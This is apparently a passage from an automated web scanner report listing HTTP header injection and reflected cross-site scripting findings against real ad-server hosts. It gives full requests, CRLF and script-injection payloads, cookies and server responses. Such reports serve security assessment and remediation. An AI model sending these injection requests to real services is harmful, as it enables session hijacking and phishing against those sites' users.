Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ANRTT=50213^1^1297712974|50220^1^1298050667|50204^1^1297630711|50237^1^1297629772|50228^1^1297628320|50229^1^1297629635|60181^1^1297628679|50209^1^1297628745|60183^1^1298036705|60369^1^1297628933|50212^1^1297794990|60329^1^1297630573|60190^1^1297629531|60136^1^1297629993|50219^1^1297630298|60182^1^1297630370|60185^1^1297630433|61165^1^1297630484|50224^1^1298035587|50382^1^1298064793; TData=99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|60506|53399|52838|53380|52847|50159|52843|52615|54490|52614|54459|52611|51186|52957|52947|53330; N=2:3e9134c20f00f3af730f8d42d1020fd5,3e9134c20f00f3af730f8d42d1020fd5af142%0d%0ac17363f719d; ATTAC=a3ZzZWc9OTk5OTk6NTAxNjA6NTA0MTI6NjE2NzQ6NjA0ODg6NjA3Mzk6NTAwMTI6NjA0OTI6NTAwNzk6NTA0MjI6NjA0OTE6NTAwODU6NTExODQ6NTEwMzY6NTAwOTk6NjA0OTA6NTI4Mzk6NjA1MTI6NjA0MjU6NTQwMzI6NjA1MDY6NTMzOTk6NTI4Mzg6NTMzODA6NTI4NDc6NTAxNTk6NTI4NDM6NTI2MTU6NTQ0OTA6NTI2MTQ6NTQ0NTk=

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:29 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 14 Feb 2011 01:52:29 GMT
Set-Cookie: ANRTT=50213^1^1297712974|50220^1^1298050667|60183^1^1298252249|50212^1^1297794990|50224^1^1298035587|50382^1^1298064793; path=/; expires=Mon, 21-Feb-11 01:37:29 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1297647449^1297649249|12327^1297647449^1297649249; path=/; expires=Mon, 14-Feb-11 02:07:29 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|60506|53399|52838|53380|52847|50159|52843|53575|52615|54490|52614|54459|52611|51186|52957|52947; expires=Thu, 09-Feb-12 01:37:29 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Mon, 14-Feb-11 07:37:29 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:3e9134c20f00f3af730f8d42d1020fd5af142
c17363f719d
,5bf47211ff9e0cf44f4ee113e10a619f; expires=Thu, 09-Feb-12 01:37:29 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTAxNjA6NTA0MTI6NjE2NzQ6NjA0ODg6NjA3Mzk6NTAwMTI6NjA0OTI6NTAwNzk6NTA0MjI6NjA0OTE6NTAwODU6NTExODQ6NTEwMzY6NTAwOTk6NjA0OTA6NTI4Mzk6NjA1MTI6NjA0MjU6NTQwMzI6NjA1MDY6NTMzOTk6NTI4Mzg6NTMzODA6NTI4NDc6NTAxNTk6NTI4NDM6NTM1NzU6NTI2MTU6NTQ0OTA6NTI2MTQ=; expires=Thu, 09-Feb-12 01:37:29 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16if17a0kq0bgd';
var ANSL='99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|
...[SNIP]...

2.48. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload a3bf5%0d%0af4a1b2b0c20 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=ADG&si=a3bf5%0d%0af4a1b2b0c20&pi=-&xs=3&pu=http%253A//www.nola.com/crime/index.ssf/2011/02/new_orleans_pizza_delivery_man.html%2523incart_mce%2526ifu%253D&v=5.5&cb=25687 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.nola.com/crime/index.ssf/2011/02/new_orleans_pizza_delivery_man.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ANRTT=50213^1^1297712974|50220^1^1298050667|50204^1^1297630711|50237^1^1297629772|50228^1^1297628320|50229^1^1297629635|60181^1^1297628679|50209^1^1297628745|60183^1^1298036705|60369^1^1297628933|50212^1^1297794990|60329^1^1297630573|60190^1^1297629531|60136^1^1297629993|50219^1^1297630298|60182^1^1297630370|60185^1^1297630433|61165^1^1297630484|50224^1^1298035587|50382^1^1298064793; TData=99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|60506|53399|52838|53380|52847|50159|52843|52615|54490|52614|54459|52611|51186|52957|52947|53330; N=2:3e9134c20f00f3af730f8d42d1020fd5,3e9134c20f00f3af730f8d42d1020fd5; ATTAC=a3ZzZWc9OTk5OTk6NTAxNjA6NTA0MTI6NjE2NzQ6NjA0ODg6NjA3Mzk6NTAwMTI6NjA0OTI6NTAwNzk6NTA0MjI6NjA0OTE6NTAwODU6NTExODQ6NTEwMzY6NTAwOTk6NjA0OTA6NTI4Mzk6NjA1MTI6NjA0MjU6NTQwMzI6NjA1MDY6NTMzOTk6NTI4Mzg6NTMzODA6NTI4NDc6NTAxNTk6NTI4NDM6NTI2MTU6NTQ0OTA6NTI2MTQ6NTQ0NTk=

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:28 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 14 Feb 2011 01:52:28 GMT
Set-Cookie: ANRTT=50213^1^1297712974|50220^1^1298050667|60183^1^1298252248|50212^1^1297794990|50224^1^1298035587|50382^1^1298064793; path=/; expires=Mon, 21-Feb-11 01:37:28 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1297647448^1297649248|a3bf5
f4a1b2b0c20
^1297647448^1297649248; path=/; expires=Mon, 14-Feb-11 02:07:28 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|60506|53399|52838|53380|52847|50159|52843|53575|52615|54490|52614|54459|52611|51186|52957|52947; expires=Thu, 09-Feb-12 01:37:28 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Mon, 14-Feb-11 07:37:28 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:3e9134c20f00f3af730f8d42d1020fd5,5bf47211ff9e0cf44f4ee113e10a619f; expires=Thu, 09-Feb-12 01:37:28 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTAxNjA6NTA0MTI6NjE2NzQ6NjA0ODg6NjA3Mzk6NTAwMTI6NjA0OTI6NTAwNzk6NTA0MjI6NjA0OTE6NTAwODU6NTExODQ6NTEwMzY6NTAwOTk6NjA0OTA6NTI4Mzk6NjA1MTI6NjA0MjU6NTQwMzI6NjA1MDY6NTMzOTk6NTI4Mzg6NTMzODA6NTI4NDc6NTAxNTk6NTI4NDM6NTM1NzU6NTI2MTU6NTQ0OTA6NTI2MTQ=; expires=Thu, 09-Feb-12 01:37:28 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16if17a0kq0bgd';
var ANSL='99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|
...[SNIP]...

2.49. http://w55c.net/m.gif [rurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://w55c.net
Path:   /m.gif

Issue detail

The value of the rurl request parameter is copied into the Location response header. The payload a0486%0d%0a6392edd76fb was submitted in the rurl parameter. This caused a response containing an injected HTTP header.

Request

GET /m.gif?rurl=a0486%0d%0a6392edd76fb HTTP/1.1
Host: w55c.net
Proxy-Connection: keep-alive
Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchpubmatic=1; matchbluekai=1; matchrubicon=1; matchgoogle=1; matchappnexus=1; matchadmeld=1; wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ

Response

HTTP/1.1 302 Found
P3P: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Location: http://a0486
6392edd76fb

Content-Length: 0
Date: Mon, 14 Feb 2011 01:34:34 GMT
Server: w55c.net


3. Cross-site scripting (reflected)

There are 691 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://a.collective-media.net/ad/cm.dailymail/ron_052010 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/cm.dailymail/ron_052010

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a3b2a<script>alert(1)</script>2a020577f18 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ada3b2a<script>alert(1)</script>2a020577f18/cm.dailymail/ron_052010;sz=300x250;ord=3461791? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; dc=dc; mmpg=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 113
Date: Mon, 14 Feb 2011 01:37:38 GMT
Connection: close
Vary: Accept-Encoding

unknown path /ada3b2a<script>alert(1)</script>2a020577f18/cm.dailymail/ron_052010;cmw=nurl;sz=300x250;ord=3461791

3.2. http://a.collective-media.net/ad/cm.drudgerep/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/cm.drudgerep/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 91f06<script>alert(1)</script>bbd480d1b59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad91f06<script>alert(1)</script>bbd480d1b59/cm.drudgerep/;sz=300x250;click0=;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 115
Date: Mon, 14 Feb 2011 02:10:23 GMT
Connection: close
Vary: Accept-Encoding

unknown path /ad91f06<script>alert(1)</script>bbd480d1b59/cm.drudgerep/;cmw=nurl;sz=300x250;click0=;ord=[timestamp]

3.3. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.dailymail/ron_052010

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2dc11'-alert(1)-'c06cd63375f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

Note that this response is served as Content-Type: application/x-javascript and is meant to be pulled in by a <script src> tag on the publisher's page, so a victim who opens the crafted URL directly is shown the script as text rather than having it executed. The injected code runs in the origin of whatever page embeds the ad tag with an attacker-influenced path. The same caveat applies to 3.4 through 3.9, which hit the same template.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value should be percent-encoded for its position in the URL and then hex-escaped (\xHH or \uHHHH) for the JavaScript string literal, rather than relying on stripping quotes.

Request

GET /adj/cm.dailymail2dc11'-alert(1)-'c06cd63375f/ron_052010;sz=300x250;ord=3412338? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 448
Date: Mon, 14 Feb 2011 01:35:24 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 01:35:24 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.dailymail2dc11'-alert(1)-'c06cd63375f/ron_052010;sz=300x250;net=cm;ord=3412338;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.4. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.dailymail/ron_052010

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6de2b'-alert(1)-'8f8feffd6d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.dailymail/ron_0520106de2b'-alert(1)-'8f8feffd6d6;sz=300x250;ord=3412338? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 448
Date: Mon, 14 Feb 2011 01:35:25 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 01:35:25 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.dailymail/ron_0520106de2b'-alert(1)-'8f8feffd6d6;sz=300x250;net=cm;ord=3412338;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.5. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.dailymail/ron_052010

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e360'-alert(1)-'b71794fc123 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.dailymail/ron_052010;sz=300x250;ord=3412338?&9e360'-alert(1)-'b71794fc123=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 452
Date: Mon, 14 Feb 2011 01:35:24 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 01:35:24 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.dailymail/ron_052010;sz=300x250;net=cm;ord=3412338?&9e360'-alert(1)-'b71794fc123=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.6. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.dailymail/ron_052010

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7086'-alert(1)-'ae7eaada4f3 was submitted in the sz parameter. This input was echoed unmodified in the application's response. As the request below shows, the scanner treats everything from sz= to the end of the request line as that parameter's value, so the payload lands after ord=3412338? rather than directly after 300x250; it is reflected into the same document.write string either way.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.dailymail/ron_052010;sz=300x250;ord=3412338?d7086'-alert(1)-'ae7eaada4f3 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 449
Date: Mon, 14 Feb 2011 01:35:23 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 01:35:23 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.dailymail/ron_052010;sz=300x250;net=cm;ord=3412338?d7086'-alert(1)-'ae7eaada4f3;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.7. http://a.collective-media.net/adj/cm.drudgerep/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.drudgerep/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22425'-alert(1)-'80a6204c2ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.drudgerep22425'-alert(1)-'80a6204c2ff/;sz=300x250;click0=;ord=$cacheBuster$ HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 444
Date: Mon, 14 Feb 2011 02:10:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 02:10:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.drudgerep22425'-alert(1)-'80a6204c2ff/;sz=300x250;net=cm;ord=$cacheBuster$;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.8. http://a.collective-media.net/adj/cm.drudgerep/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.drudgerep/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4b37'-alert(1)-'600aca90b1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.drudgerep/;sz=300x250;click0=;ord=$cacheBuster$&d4b37'-alert(1)-'600aca90b1e=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
